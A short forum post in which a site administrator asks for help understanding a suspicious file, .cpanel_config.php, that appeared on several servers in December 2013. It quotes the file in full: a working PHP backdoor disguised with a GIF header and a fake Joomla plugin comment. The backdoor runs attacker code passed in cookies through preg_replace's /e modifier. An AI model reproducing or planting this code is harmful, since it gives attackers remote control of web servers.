This night (00:00 to 05:00 GMT +1 at 18/12/2013) on some servers, and some accounts, a suspicious file named .cpanel_config.php on webroot
content of file (i don't undestand)
Somebody can explain about the code?
content of file (i don't undestand)
Code:
GIF89a
<?php
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}